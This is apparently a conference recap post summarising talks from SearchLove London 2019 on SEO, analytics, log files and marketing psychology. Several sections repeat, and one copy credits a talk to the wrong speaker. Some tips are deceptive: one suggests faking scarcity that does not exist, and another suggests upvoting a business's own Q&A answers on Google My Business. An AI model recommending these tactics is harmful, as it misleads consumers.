SearchLove London 2019 - Andi Jarvis - The Science of Persuasion from Distilled
Heather Physioc - ‘Building a Discoverability Powerhouse: Lessons From Integrating Organic Search, Paid Search & Performance Content’
Organic search, paid search, performance content and the like all impact discoverability. Yet, in many organisations, these teams are siloed. Heather discussed tips for integrating and collaborating between teams to build a “discoverability powerhouse”.
There are definite obstacles to integrating marketing teams like paid, social, or organic.
Merging teams too much can actually diminish agility. Depending on what marketing needs are at different times, allow for independence of teams when it’s necessary to get a job done.
Every team has their own processes for getting things done. Don’t try to overhaul everything at once. Talk with each other to see where integration makes the most sense.
There are also clear wins when you’re able to collaborate effectively.
When you’re in harmony with each team, you can more seamlessly find opportunities for discoverability. This can ultimately lead to up-sells or cross-sells.
By working together, we can share knowledge more deeply and have richer data. We can then leverage this to capture as much of the SERP as possible.
Cross-training teams can help build empathy and trust. When separate teams gain an understanding of how and why certain tasks (i.e. keyword research) are done, it can help everyone work better together and streamline processes.
SearchLove London 2019 - Heather Physioc - Building a Discoverability Powerhouse from Distilled
Robin Lord - ‘Excel? It Would Be Easier To Go To Jupyter’
Robin, a senior consultant here at Distilled, demonstrated the various shortcomings of Excel and showed an easier, repeatable, and more effective way to get things done - using Jupyter Notebooks and Python.
Below we outline Robin’s main points:
Excel and Google Sheets are very error-prone - especially if you’re dealing with larger data sets! If you need to process a lot of data, then you should consider using Jupyter Notebooks, as it can handle much bigger data sets (think: analysing backlinks, doing keyword research, log file analysis)
Jupyter Notebooks are reusable: if you create a Jupyter script to do any repeatable task (i.e. reporting or keyword research) then you can reuse it. This makes your life much easier because you don’t have to go back and dissect an old process.
Jupyter allows you to use regex. This gives a huge advantage over Excel because it is far more efficient at accounting for misspellings - for example, it gives you a far more accurate way of capturing branded search query permutations.
Jupyter allows you to write notes and keep every step in your process ordered. This means that your methodology is noted and the next time you perform this task, you remember exactly the steps you took. This is especially useful for when clients ask you questions about your work weeks or months down the line!
Finally - Jupyter notebooks allow us to get answers that we can’t get from Excel. We’re able to not only consider the data set from new angles, but we also have more time to go about other tasks, such as thinking about client strategy or improving other processes.
Robin has so many slides it breaks Slideshare. Instead, you can download his slides from Dropbox.
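As one hedged sketch of the regex point (the brand and its misspellings are made up): a single pattern catches permutations that exact-match spreadsheet formulas would miss.

```python
import re

# One pattern for a hypothetical brand and its common misspellings:
# "distilled", "distiled", "disilled", case-insensitive
branded = re.compile(r"\bdist?ill?ed\b", re.IGNORECASE)

queries = [
    "distilled seo training",
    "distiled searchlove",    # misspelling, still caught
    "Distilled london office",
    "seo split testing",
]
branded_queries = [q for q in queries if branded.search(q)]
print(branded_queries)
```

In a notebook this classification runs over hundreds of thousands of queries without the copy-paste errors a spreadsheet invites.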
Jes Scholz - ‘Giving Robots An All Access Pass’
Jes Scholz uses the analogy of a nightclub to explain how Googlebot interacts with your website. The goal? To become part of the exclusive “Club Valid”. Her main points are outlined below:
As stated by John Mueller himself, “crawl budget is overrated - most sites never need to worry about this”. So instead of focusing on how much Google is crawling your site, you should be most concerned with how Google is crawling it
Status codes are not good or bad - there are right codes and wrong codes for different situations
In a similar vein, duplicate content is not “bad”, in fact, it’s entirely natural. You just need to make sure that you’re handling it correctly
JavaScript is your ticket to better UX; however, bear in mind that it often presents a host of SEO difficulties. Make sure that you don’t rely on the mobile-friendly testing tool to see if Google is able to crawl your JavaScript - this tool actually uses different software to Googlebot (this is a common misconception!) The URL inspection tool is a bit better for checking this; however, bear in mind it’s more patient than Googlebot when it comes to rendering JavaScript, so isn’t 100% accurate.
SearchLove London 2019 - Jes Scholtz - Giving Robots an All Access Pass from Distilled
Rand Fishkin - ‘The Search Landscape in 2019’
As the web evolves, it’s important to evaluate the areas you could invest in carefully. Rand explored the key changes affecting search marketers and how SEOs can take these changes into account when determining strategy.
Should you invest in voice search? It’s probably a bit too early. There is little difference in the results you get from a voice search vs. a manual search.
Both mobile and desktop are big - don’t neglect one at the expense of the other!
The zero-click search is where the biggest search growth is happening right now. It now accounts for about half (48.96% in the US) of all searches!
If you could benefit from answering zero-click searches, then you should prepare for that. You can determine whether you’d benefit by evaluating the value in ranking for a particular query without necessarily getting traffic.
With changes in Google search appearance recently, ads have become more seamless in the SERP. This has led to paid click-through-rate rising a lot. However, if history is correct, then it will probably slowly decline until the next big search change.
As Google’s algorithms evolve, you’ll likely receive huge ranking benefits from focusing on growing authority signals (E-A-T).
Check out Rand’s slides to see where you should be spending your time and money as the search landscape evolves.
SearchLove London 2019 - Rand Fishkin - The Search Landscape in 2019 from Distilled
Learning the language that they’re using. Do some research into the terminology as well as possible limitations of your ask. This will make you more credible and you’re more likely to be taken seriously.
A team of developers may have different KPIs than you. It may be beneficial to use something like revenue as a way to get them on board with the change you want to make.
Try to make every ask more collaborative rather than instructive. For example, instead of simply presenting “insert this code,” try “here’s some example code, maybe we can incorporate x elements. What do you think?” A conversation may be the difference in effecting change.
Prioritising your requests in an easily readable way for web dev teams is always a good idea. It will give them the most information on what needs to get done in what timeline.
SearchLove London 2019 - Miracle Inameti-Archibong - The Complete Guide to Actionable Speed Audits from Distilled
Faisal Anderson - ‘Spying On Google: Using Log File Analysis To Reveal Invaluable SEO Insights’
Log files contain hugely valuable insight on how Googlebot and other crawlers behave on your site. Rory uncovered why you should be looking at your logs as well as how to analyse them effectively to reveal big wins that you may have otherwise been unable to quantify.
Looking at log files is a great way to see the truest and freshest data on how Google is crawling your site. It’s most accurate because it’s the actual logs of how Google (and any other bot) is crawling your website.
Getting log file data can be tricky, so it’s helpful to ask devs about your hosting setup (if your server uses load balancing, the log files may be split between various hosts). You’ll want to get 6 months of data if you can.
The three main things to evaluate when you’re analysing log files
Crawl behavior: look at most and least crawled URLs, look at crawl frequency by depth and internal links
Budget waste: find low value urls (faceted nav, query params, etc.) there are likely some subdirectories you want crawled more than others
Site health: look for inconsistent server responses
Using Jupyter to do log file analysis is great because it’s reusable and you’ll be able to use it again and again.
SearchLoveLondon 2019 - Faisal Anderson - Spying on Google: Using Log File Analysis to Reveal Invaluable SEO Insights from Distilled
Dr Pete Myers - ‘Scaling Keyword Research: More Isn’t Better’
Dr Pete Myers discussed how more is not better when it comes to keyword research! Ditch the thousands of keywords and instead focus on a smaller set of keywords that actually matter for you or your clients. Below are his top tips:
Pete has developed a simple metric called RankVol to help determine the importance of a keyword
RankVol = 1 / (rank x square root of volume)
Using this metric is better than sorting by search volume, as often the highest volume keywords that a site is appearing for are not the most relevant
Lots of data in keyword research can be irrelevant. Using John Lewis as an example:
9% of keywords John Lewis ranks for are mis-spellings
Almost 20% of keywords they rank for are very close variants (plural vs. singular, for example)
Dr Pete provides a short script in his deck to group keywords to help strip out noise in your data set
If sitelinks appear for your website, Google thinks you’re a brand
A new SERP feature (‘best of’ carousel) is appearing in the US, and will likely be rolled out into Europe soon
This feature takes you to a heavily paid SERP, with lots of ads (some well-disguised!)
If a keyword has a heavily paid SERP, you should probably not bother trying to rank for it, as the pay-off will be small
‘People also ask’ is on 90% of searches - be sure to try and take advantage of this SERP space
To summarise, perception is everything with keyword research - make sure you filter out the noise!
SearchLove London 2019 - Dr. Pete Meyers - Scaling Keyword Research: More Isn't Better from Distilled
Lindsay Wassell - ‘Managing Multinational & Multilingual SEO in Motion’
Lindsay covered the many challenges involved in handling migrations involving multiple international site variants. Her key points are highlighted below:
Ask your dev team to make sure it’s possible to implement hreflang via XML sitemaps or on-page; then if there are problems implementing one method, you have another as a fall-back option
When deciding site structure and where international sites should be located (sub-folder? Subdomain? ccTLD?) bear in mind that there are no one-size-fits all solutions. It may be best to have a mixture of solutions, depending on each market.
If you have hreflang relationship issues, Lindsay advises to use Google Sheets to manage hreflang mappings, in combination with a script that can automatically generate XML sitemaps (link provided in her deck)
In order to encourage more people in your organisation to understand the importance of SEO and to make it a priority, highlight statistics such as traffic levels and revenue coming from organic search
Also keep in mind that every department has a wish list when it comes to a migration! Be tactical and tack onto other people’s wishlists to get SEO items implemented
As a final tip - check redirects before going live, as often dev teams will say it’s under control, and then there can be problems at the last minute
SearchLove London 2019 - Lindsay Wassell - Managing Multinational & Multilingual SEO in Motion from Distilled
Stacey MacNaught - ‘Actioning Search Intent - What To Do With All That Data’
By analysing search intent, you can gain a ton of really insightful data. Stacey discussed how you can utilise all of this data to optimise your site for organic search and ultimately increase revenue and traffic.
Traditionally, search intent is categorised broadly as navigational, informational, and transactional. However, it’s often unclear where things are categorised because sometimes keywords are really ambiguous. Often you can break these categories down into more specific categories.
In terms of targeting keywords on your site, look out for opportunities where you may not be delivering the right content based on what query you’re targeting.
For example, if you’re targeting an informational keyword with a transactional result, you’re not going to rank. This can be an opportunity for you to create the kind of page that will rank for a select query. If the phrase is “best ballet shoes” and the results are informational pages, then you shouldn’t be serving a transactional result.
If you can be objective about the topic at hand and you have someone qualified to write that content, then you should definitely do it.
If your rankings drop but revenue unaffected, it’s likely you’ve lost rankings on informational keywords
Don’t assume that users will come back of their own accord - work with PPC and get them to retarget to users who have read your content
Build out different audience lists according to the types of content or topics that users have been reading
Build out separate PPC campaigns for this so you can easily monitor results
Stacey saw CPA fall by -34% when she did this for a healthcare site
To generate content ideas, talk to the sales and customer service teams to find out what users are asking, then build content around it
You can also use Google Forms to survey previous customers to find out what drove their purchase
SearchLove London 2019 - Stacey MacNaught - Actioning Search Intent: What to Do with All That Data from Distilled
Will Critchlow - ‘Misunderstood Concepts at the Heart of SEO - Get An Edge By Understanding These Areas’
Most things in SEO can be boiled down to technical accessibility, relevance, quality, and authority. Or: can it be crawled, does it meet a keyword need, and is it trustworthy? However, some of the foundational elements of SEO are misunderstood.
Regarding crawlability, it’s important to understand how setting directives in robots.txt will impact your site if handled incorrectly.
Robots.txt directives do not cascade. For example, if you set a specific directive to disallow Googlebot from /example, that is the one it will follow. Even if you specify that * (all user agents) are disallowed from /dont-crawl elsewhere in the file, Googlebot will only follow it’s set directive not to crawl /example and still be able to crawl /dont-crawl.
The Google documentation, robots.txt checker in  GSC, and the open source parser tend to disagree on what is allowed and disallowed. So, you’ll need to do some testing to ensure that the directives you’re setting are what you intended.
We often have  a lot of intuition about how things like pagerank work, but too many of our recommendations are based on misconceptions about how authority flows
There are some huge changes coming to major browser cookie handling. The cookie window will be shorter, which means that a lot of traffic that’s currently classified as organic will be classified as direct. Understanding the language around the changes that are happening is, and will be, important
There are common misconceptions too about the meaning of ‘long tail keywords’
50% of Twitter respondents incorrectly think it means that there are many words in a query
40% understand the correct meaning, which is that they are keywords with low search volume
SearchLove London 2019 - Will Critchlow - Misunderstood Concepts at the Heart of SEO from Distilled
That's it for our London conference for another year. But the good news is we are heading to San Diego in March where we'll be getting some sun, sea and search at SearchLove San Diego!
If you have any questions about our conferences please leave a comment below or come and say hello over on Twitter.
SearchLove London 2019: The Great Big Round Up
On 14th and 15th October, we made our annual visit to The Brewery in London for our UK edition of SearchLove. This year’s conference was our most successful yet, not only in terms of the number of folks attending but also with regard to the high calibre of speakers who joined us over the jam-packed two days to share their invaluable industry insights. 
Let the show begin! #searchlove #seo pic.twitter.com/zDIRbbX2KG
— Udo Leinhäuser (@u_leinhaeuser) October 14, 2019
This post is a quick-fire summary of the knowledge our speakers had to share, plus their slides & a few photos from across the conference.  All sessions in their entirety will be available with a DistilledU membership in a couple of weeks' time. And don’t forget that if you feel you missed out this year,  make sure you sign up to our mailing list to be the first in the know for next year’s conference! Are you ready? Let’s get started!
Marie Haynes - ‘Practical Tips For Improving E-A-T’
Google’s algorithms are increasingly considering E-A-T components (expertise, authority and trust) when evaluating sites. Marie shared why and how to improve E-A-T so that you have the best chance at winning in the current and future search landscape.
One of the most important things to focus on is the accuracy of the information on your site. This is especially important if your pages are primarily YMYL (‘your money or your life’, in other words, content that can affect someone’s health, safety, financial stability, etc.).
Google’s quality raters use the quality raters guidelines as their textbook. If you take a look at the guidelines, you can get a better idea about what Google is actually looking at when they’re evaluating E-A-T components. Try doing a CTRL+F for your industry to see what they suggest for your vertical.
There are some practical things you can do on your site to help Google understand that you’re trustworthy and authoritative:
Have contact information available.
If you’re eCommerce, ensure that your refund policy and customer service information is clearly accessible.
Make sure your site is secure (HTTPS)
Have correct grammar. How your page reads is important!
Make sure that the information on your site doesn’t contradict scientific consensus (well-established facts in your field). Cite all sources as necessary.
SearchLove London 2019 - Marie Haynes - Practical Tips for Improving E-A-T from Distilled
Sarah Gurbach - ‘Using Qualitative Data To Make Human-Centered Decisions’
SEOs have a huge amount of data to work with, but often, the data that gets overlooked is that which comes directly from the humans who are driving all of our data points.
By performing qualitative research in tandem with quantitative, we can get insights on the actual human wants, barriers, and confusions that drive our customers to make their decisions and move through the funnel.
Sarah’s steps to conducting qualitative research include:
Defining your objective. Write it as a question. Keep it specific, focused and simple.
Asking open-ended questions to customers to define the personas you should be targeting. Sarah recommends surveys of 10 questions to 5 customers that should only take around 20 minutes each. More than this will likely be redundant.
Actually observing our users to figure out what and how they’re searching and moving through the funnel.
You can then quantify this data by combining it with other data sources (i.e. PPC data, conversion data, etc.).
If you don’t have time to conduct surveys, then you can go to social media and ask a question!
Want more on questions you can ask your customers? Check out this resource from Sarah.
SearchLove London 2019 - Sarah Gurbach - Using Qualitative Data to Make Human-centered Decisions from Distilled
Greg Gifford - ‘Doc Brown’s Plutonium-Powered SEO Playbook’
Greg delivered an entertaining, informative and best of all highly actionable talk on local SEO. If you have physical locations for your business, you should not be neglecting your local SEO strategy! It’s important to remember that there is a different algorithm for local SEO compared to the traditional SERP, and therefore you need to approach local SEO slightly differently.
Greg’s key tips to nailing your local SEO strategy are as follows:
Links are weighted differently for local SEO! Make sure you acquire local links - quality, and whether these are follow or nofollow, matters far less than in the standard SERP. The key is to make sure your links are local - get your hands dirty with some old-school marketing and get out into your local community to build links from churches, businesses and community websites in your area.
Content needs to actually be about your business and local area. If you could reuse your website copy for a site in another area, you’re doing it wrong. Also, make sure that your blog is a local destination - if your content is more localised than your competitors’, you’ll be one step ahead.
Citations are also important, but you only need a handful! Make sure you link to your website from places that customers will actually see, such as your Facebook, Twitter and other social profiles. Ensure your business information is accurate across platforms.
Reviews need to be strong across platforms - there’s no use having excellent reviews in Google My Business, and then bad reviews on TripAdvisor!
Google My Business is your new homepage, so make sure you give it some attention!
Bear in mind that users can not only ask questions but also answer them - make sure you create your own Q&A here and upvote your answers so that they appear at the top.
Also be aware that clicks from GMB are recorded as direct! If you use UTM tracking parameters, then you can update the tracking so that you can attribute it correctly to organic.
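As a sketch of that last tip: the UTM values below (source, medium, campaign) are illustrative assumptions rather than official conventions, so adapt them to your own tracking scheme. A small Python helper for tagging the website URL on a GMB listing might look like this:

```python
from urllib.parse import urlencode, urlparse, urlunparse, parse_qsl

def tag_gmb_url(url, source="google", medium="organic", campaign="gmb-listing"):
    """Append UTM parameters so that clicks from the GMB listing are
    attributed correctly in analytics instead of showing up as direct."""
    parts = urlparse(url)
    query = dict(parse_qsl(parts.query))  # keep any existing parameters
    query.update({
        "utm_source": source,
        "utm_medium": medium,
        "utm_campaign": campaign,
    })
    return urlunparse(parts._replace(query=urlencode(query)))

print(tag_gmb_url("https://www.example.com/"))
# https://www.example.com/?utm_source=google&utm_medium=organic&utm_campaign=gmb-listing
```

You would then paste the tagged URL into the website field of your listing, so every GMB click arrives with the parameters attached.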
SearchLove London 2019 - Greg Gifford - Doc Brown's Plutonium-powered Local SEO Playbook from Distilled
Luke Carthy - ‘Finding Powerful CRO and UX Opportunities Using SEO Crawlers’
Luke Carthy discussed the importance of not always striving to drive more traffic, but making the most of the traffic you currently do have. More traffic does not necessarily equal more conversions! He explored different ways to identify opportunities using crawl software and custom extraction, and to use these insights to improve conversion rates on your website.
His top recommendations include:
Look at the internal search experience of users - do they get a ‘no results found’ page? What does this look like - does it provide a good user experience? Does it guide users to alternative products?
Custom extraction is an excellent way to mine websites for information (your own and especially competitors!)
Consider scraping product recommendations:
What products are competitor sites recommending? These are often based on dynamic algorithms, so provide a good insight into what products customers buy together
Also pay attention to the price of the recommended products vs. the main product - recommended items are often more expensive, to encourage users to spend more
Also consider scraping competitor sites for prices, review and stock
Are you cheaper than competitors?
Do competitors have popular products that you don’t have? What are their best and worst-performing products? Often category or search results pages are ordered by best-sellers, and you can take advantage of this by mining this information
To deepen your analysis, plugin other data such as log file data, Google Analytics, XML sitemaps and backlinks to try to understand how you can improve your current results, and to obtain comprehensive insights that you can share with the wider team
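To make the custom-extraction idea concrete, here’s a minimal sketch. The markup, class names and prices below are entirely hypothetical - on a real site you’d pull the equivalent elements with your crawler’s XPath/CSS custom extraction rather than a regex - but the principle of turning scraped competitor pages into comparable price data is the same:

```python
import re

# Hypothetical competitor category-page markup; real sites will differ,
# and a crawler's custom extraction would normally fetch this for you.
html = """
<div class="product"><span class="name">Widget A</span><span class="price">£19.99</span></div>
<div class="product"><span class="name">Widget B</span><span class="price">£24.50</span></div>
"""

# Extract (name, price) pairs and turn them into a comparable dict
products = re.findall(
    r'<span class="name">(.*?)</span><span class="price">£([\d.]+)</span>', html
)
prices = {name: float(price) for name, price in products}
print(prices)  # {'Widget A': 19.99, 'Widget B': 24.5}
```

From here you could join the extracted prices against your own catalogue to see where you’re cheaper or more expensive than the competition.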
SearchLove London 2019 - Luke Carthy - Finding Powerful CRO and UX Opportunities Using SEO Crawlers from Distilled
Andi Jarvis - ‘The Science of Persuasion’
Human psychology affects consumers’ buying behaviour tremendously. Andi covered how we as SEOs can better understand these factors to influence our SEO strategy and improve conversions.
Scarcity: you can create the impression of scarcity even when it doesn’t exist, by creating scarcity of time to drive demand. An example of this is how Hotels.com creates a sense of urgency by including things like “Only 4 rooms left!” Test and learn with different time scales (hours, days, weeks or more) to see what works best for your product offering.
Authority: building authority helps people understand who they should trust. When you’ve got authority, you are more likely to persuade people. You can build authority simply by talking about yourself, and by labelling yourself as an authority in your industry.
Likeability: The reason that influencer marketing works is due to the principle of liking: we prefer to buy from people who we are attracted to and who we aspire to be. If we can envision ourselves using a product or service by seeing ourselves in its marketing, then we are more likely to convert.
Pretty Little Thing has started doing this by using two different models to showcase its clothing, increasing the likelihood that users identify with them
Purpose: People are more likely to buy when they feel they are contributing to a cause, for example, Pampers who has a partnership with Unicef, so consumers feel like they are doing a good deed when they buy Pampers products. This is known as cause-based or purpose-based marketing.
Social proofing: It’s been known for a long time that people are influenced by the behaviour of others. In the early 1800s, theatres would pay people to clap at the right moments in a show, to encourage others to join in. Similarly today, if a brand has several endorsements from celebrities or users, people are more likely to purchase their products.
Reciprocation: Offering customers a free gift (even if small) can have a positive impact on re-purchase rates. Make sure though that you evolve what you do if you have a regular purchase cycle - offer customers different gifts so that they don’t know what to expect, otherwise the positive effect wears off.
SearchLove London 2019 - Andi Jarvis - The Science of Persuasion from Distilled
Heather Physioc - ‘Building a Discoverability Powerhouse: Lessons From Integrating Organic Search, Paid Search & Performance Content’
Organic, paid content and the like all impact discoverability. Yet, in many organisations, these teams are siloed. Heather discussed tips for integrating and collaborating between teams to build a “discoverabilty powerhouse”.
There are definite obstacles to integrating marketing teams like paid, social, or organic.
Merging teams too much can actually diminish agility. Depending on what marketing needs are at different times, allow teams independence when it’s necessary to get a job done.
Every team has their own processes for getting things done. Don’t try to overhaul everything at once. Talk with each other to see where integration makes the most sense.
There are also clear wins when you’re able to collaborate effectively.
When you’re in harmony with each team, you can more seamlessly find opportunities for discoverability. This can ultimately lead to up-sells or cross-sells.
By working together, we can share knowledge more deeply and have richer data. We can then leverage this to capture as much of the SERP as possible.
Cross-training teams can help build empathy and trust. When separate teams gain an understanding of how and why certain tasks (i.e. keyword research) are done, it can help everyone work better together and streamline processes.
SearchLove London 2019 - Heather Physioc - Building a Discoverability Powerhouse from Distilled
Robin Lord - ‘Excel? It Would Be Easier To Go To Jupyter’
Robin, a senior consultant here at Distilled, demonstrated the various shortcomings of Excel and showed an easier, repeatable, and more effective way to get things done - using Jupyter Notebooks and Python.
Below we outline Robin’s main points:
Excel and Google Sheets are very error-prone - especially if you’re dealing with larger data sets! If you need to process a lot of data, then you should consider using Jupyter Notebooks, as it can handle much bigger data sets (think: analysing backlinks, doing keyword research, log file analysis)
Jupyter Notebooks are reusable: if you create a Jupyter script to do any repeatable task (i.e. reporting or keyword research) then you can reuse it. This makes your life much easier because you don’t have to go back and dissect an old process.
Jupyter allows you to use regex. This gives a huge advantage over Excel because it is far more efficient at accounting for misspellings - for example, it gives you a much better chance of accurately capturing branded search query permutations.
Jupyter allows you to write notes and keep every step in your process ordered. This means that your methodology is noted and the next time you perform this task, you remember exactly the steps you took. This is especially useful for when clients ask you questions about your work weeks or months down the line!
Finally - Jupyter notebooks allow us to get answers that we can’t get from Excel. We’re able to not only consider the data set from new angles, but we also have more time to go about other tasks, such as thinking about client strategy or improving other processes.
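For example, a tolerant regex for a hypothetical brand (“Distilled”, with made-up misspellings) can classify branded queries in a way that Excel’s exact matching can’t - a sketch:

```python
import re

# One tolerant pattern catches common misspellings and variants of a
# hypothetical brand name that an exact-match Excel formula would miss.
BRAND = re.compile(r"\bdist?i+l+e?d\b", re.IGNORECASE)

queries = ["distilled seo", "distiled training", "distilled london", "seo tips"]
branded = [q for q in queries if BRAND.search(q)]
print(branded)  # ['distilled seo', 'distiled training', 'distilled london']
```

In a real keyword-research notebook you would run a pattern like this over tens of thousands of queries to split branded from non-branded traffic in one reusable step.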
Robin has so many slides it breaks Slideshare. Instead, you can download his slides from Dropbox.
Jes Scholz - ‘Giving Robots An All Access Pass’
Jes Scholz uses the analogy of a nightclub to explain how Googlebot interacts with your website. The goal? To become part of the exclusive “Club Valid”. Her main points are outlined below:
As stated by John Mueller himself, “crawl budget is overrated - most sites never need to worry about this”. So instead of focusing on how much Google is crawling your site, you should be most concerned with how Google is crawling it
Status codes are not good or bad - there are right codes and wrong codes for different situations
In a similar vein, duplicate content is not “bad”, in fact, it’s entirely natural. You just need to make sure that you’re handling it correctly
JavaScript is your ticket to better UX; however, it often presents a host of SEO difficulties. Make sure that you don’t rely on the mobile-friendly testing tool to see if Google is able to crawl your JavaScript - this tool actually uses different software to Googlebot (a common misconception!). The URL inspection tool is a bit better for checking this, but bear in mind it’s more patient than Googlebot when it comes to rendering JavaScript, so it isn’t 100% accurate.
SearchLove London 2019 - Jes Scholtz - Giving Robots an All Access Pass from Distilled
Rand Fishkin - ‘The Search Landscape in 2019’
As the web evolves, it’s important to evaluate the areas you could invest in carefully. Rand explored the key changes affecting search marketers and how SEOs can take these changes into account when determining strategy.
Should you invest in voice search? It’s probably a bit too early. There is little difference in the results you get from a voice search vs. a manual search.
Both mobile and desktop are big - don’t neglect one at the expense of the other!
The zero-click search is where the biggest search growth is happening right now. It now accounts for about half (48.96% in the US) of all searches!
If you could benefit from answering zero-click searches, then you should prepare for that. You can determine whether you’d benefit by evaluating the value in ranking for a particular query without necessarily getting traffic.
Recent changes to Google’s search appearance have made ads more seamless in the SERP, and paid click-through rate has risen a lot as a result. However, if history is any guide, it will probably decline slowly until the next big search change.
As Google’s algorithms evolve, you’ll likely receive huge ranking benefits from focusing on growing authority signals (E-A-T).
Check out Rand’s slides to see where you should be spending your time and money as the search landscape evolves.
SearchLove London 2019 - Rand Fishkin - The Search Landscape in 2019 from Distilled
Emily Potter - ‘Can Anything in SEO Be Proven? A Deep-Dive Into SEO Split-Testing’
Split testing SEO changes allows us to say with confidence whether or not a specific change hurts or helps organic traffic. Emily discussed various SEO split tests she’s run and potential reasons for their outcomes.
The main levers for SEO tend to boil down to:
1. Improving organic click-through-rate (CTR)
2. Improving organic rankings of current keywords
3. Ranking for new keywords
Split testing changes that we want to make to our site can help us to make business cases, rescue sessions, and gain a competitive advantage.
Determining which of the three levers causes a particular test to be positive or negative is challenging: because they all impact each other, the data is noisy. Measuring organic sessions relieves us of this noise.
Following “best practices” or what your competitors are doing is not always going to result in wins. Testing shows you what actually works for your site. For example, adding quantity of products in your titles or structured data for breadcrumbs might actually negatively impact your SEO, even if it seems like everyone else is doing so.
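To illustrate the session-based measurement idea with a deliberately simplified sketch (the numbers are invented, and this is not the statistical model a real split-testing platform would use), you can estimate uplift by asking what the variant pages would have done had they only moved with the control:

```python
# Toy numbers: weekly organic sessions for the variant and control
# page groups, before and after the change went live.
variant_before, variant_after = 10_000, 11_200
control_before, control_after = 9_800, 9_900

# Expected variant sessions if it had only followed the control's trend
expected = variant_before * (control_after / control_before)
uplift = (variant_after - expected) / expected
print(f"Estimated uplift: {uplift:.1%}")  # Estimated uplift: 10.9%
```

A production test would add confidence intervals and run long enough to separate the change from seasonal noise, but the core comparison is the one above.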
Check out Emily’s slides to see more split test case studies and learnings!
Lessons from another year in SEO A/B Testing - SearchLove London 2019 from Emily Potter
Jill Quick - ‘Segments: How To Get Juicy Insights & Avoid The Pips!’
In her excellent talk, Jill highlights how “average data gives you average insights”, and discusses the importance of segmenting your data to gain deeper insights into user behaviour. While analytics and segments are awesome, don’t become overwhelmed with the possibilities - focus on your strategy and work from there.
Jill’s other tips include:
Adding custom dimensions to forms on your website allows you to create more relevant and specific data segments
For example, if you have a website in the education sector, you can add custom dimensions to a form that asks people to fill in their profession.  You can then create a segment where custom dimension = headteacher, and you can then analyse the behaviour of this specific group of people
Build segments that look at your best buyers (people who convert well) as well as your worst customers (those who spend barely any time on site and never convert). You can learn a lot about your ideal customer, as well as what you need to improve on your site, by doing this.
Use your segments to build retargeting lists - this will usually result in lower CPAs for paid search, helping your PPC budget go further
Don’t forget to use advanced segments (using sequences and conditions) to create granular segments that matter to your business
You can use segments in Google Data Studio, which is awesome! Just bear in mind that in Data Studio you can’t see if your segment data is sampled, so it’s best to go into the GA interface to check
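Once a custom dimension like “profession” is flowing into your analytics export, building a segment is essentially just filtering rows. A toy sketch with invented session data:

```python
# Toy analytics export: each row is a session carrying a custom dimension.
sessions = [
    {"profession": "headteacher", "duration": 310, "converted": True},
    {"profession": "headteacher", "duration": 95,  "converted": False},
    {"profession": "student",     "duration": 40,  "converted": False},
]

# Segment: sessions where custom dimension "profession" = headteacher
segment = [s for s in sessions if s["profession"] == "headteacher"]
conv_rate = sum(s["converted"] for s in segment) / len(segment)
print(f"Headteacher sessions: {len(segment)}, conversion rate: {conv_rate:.0%}")
```

The same filter-then-measure pattern applies whether you build the segment in the GA interface or against a raw export.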
If you want to hear more about Jill's session, she's written a post to supplement her slides.
Segments in Google Analytics from The Coloring In Department
Rory Truesdale - ‘Using The SERPs to Know Your Audience’
It can be easy to get lost in evaluating metrics like monthly search volume, but we often forget that for each query, there is a person with a very specific motivation and need. Rory discussed how we can utilise Google’s algorithmic re-writing of the SERP to help identify those motivations and more effectively optimise for search intent - the SERPs give us amazing insight into what customers want!
Google rewrites the meta description displayed in the SERP 84% of the time (it thinks it’s smarter than us!). However, we can use this rewrite data to our advantage.
The best ways to get SERP data are crawling SERPs with Screaming Frog, the scraper API or Chrome extension, or “Thruuu” (a SERP analysis tool), and then using Jupyter Notebooks to analyse it.
Scraping SERPs, product reviews, comments, or Reddit forums can be really powerful: it gives you a data source that reveals what your customers want. You can then optimise the content on your pages to appeal to them.
If you can get a better idea about what language and tone resonates with users, you can incorporate it into CTAs and content.
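Rory's own notebook is far more complete; purely as a minimal stdlib sketch of the idea, here is how you might measure how often Google rewrote your meta descriptions and mine the language it chose instead (the scraped rows are invented):

```python
import re
from collections import Counter

# Illustrative scrape output: each row pairs a page's meta description
# with the snippet Google actually displayed for a query.
serp_rows = [
    {"meta": "Buy ballet shoes online.", "displayed": "Compare the best ballet shoes for beginners."},
    {"meta": "Buy ballet shoes online.", "displayed": "Buy ballet shoes online."},
    {"meta": "Ballet shoes from £10.", "displayed": "Best ballet shoes reviewed by experts."},
]

rewritten = [r for r in serp_rows if r["displayed"] != r["meta"]]
share = len(rewritten) / len(serp_rows)
print(f"{share:.0%} of snippets were rewritten by Google")

# Mine the rewritten snippets for the language Google chose to surface.
words = Counter(
    w for r in rewritten for w in re.findall(r"[a-z']+", r["displayed"].lower())
)
print(words.most_common(3))
```

The terms that keep surfacing in rewritten snippets are candidates for your own titles, descriptions, and CTAs.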
Check out Rory’s slides as well as the Jupyter notebook he uses to analyse SERP data.
SearchLove London 2019 - Rory Truesdale - Using the SERPs to Know Your Audience from Distilled
Miracle Inameti Archibong - ‘The Complete Guide To Actionable Speed Audits: Getting Your Developer To Work With You’
It can be a huge challenge to get devs to implement our wishlist of SEO recommendations. Miracle discussed the practical steps to getting developers to take your recommendations seriously.
If you take some time to understand the Web Dev roles at your company, then it will help you better communicate your needs as an SEO and get things rolled out. You can do this by:
Learning the language that they’re using. Do some research into the terminology as well as possible limitations of your ask. This will make you more credible and you’re more likely to be taken seriously.
A team of developers may have different KPIs than you. It may be beneficial to use something like revenue as a way to get them on board with the change you want to make.
Try to make every ask more collaborative rather than instructive. For example, instead of simply presenting “insert this code,” try “here’s some example code, maybe we can incorporate x elements. What do you think?” A conversation may be the difference in effecting change.
Prioritising your requests in an easily readable way for web dev teams is always a good idea. It will give them the most information on what needs to get done in what timeline.
SearchLove London 2019 - Miracle Inameti-Archibong - The Complete Guide to Actionable Speed Audits from Distilled
Faisal Anderson - ‘Spying On Google: Using Log File Analysis To Reveal Invaluable SEO Insights’
Log files contain hugely valuable insight on how Googlebot and other crawlers behave on your site. Faisal uncovered why you should be looking at your logs as well as how to analyse them effectively to reveal big wins that you may have otherwise been unable to quantify.
Looking at log files is a great way to see the truest and freshest data on how Google is crawling your site. It’s most accurate because it’s the actual logs of how Google (and any other bot) is crawling your website.
Getting log file data can be tricky, so it’s helpful to ask devs about your hosting setup (if your server uses load balancing, the log files may be split between various hosts). You’ll want to get 6 months of data if you can.
The three main things to evaluate when you’re analysing log files
Crawl behavior: look at most and least crawled URLs, look at crawl frequency by depth and internal links
Budget waste: find low-value URLs (faceted nav, query params, etc.); there are likely some subdirectories you want crawled more than others
Site health: look for inconsistent server responses
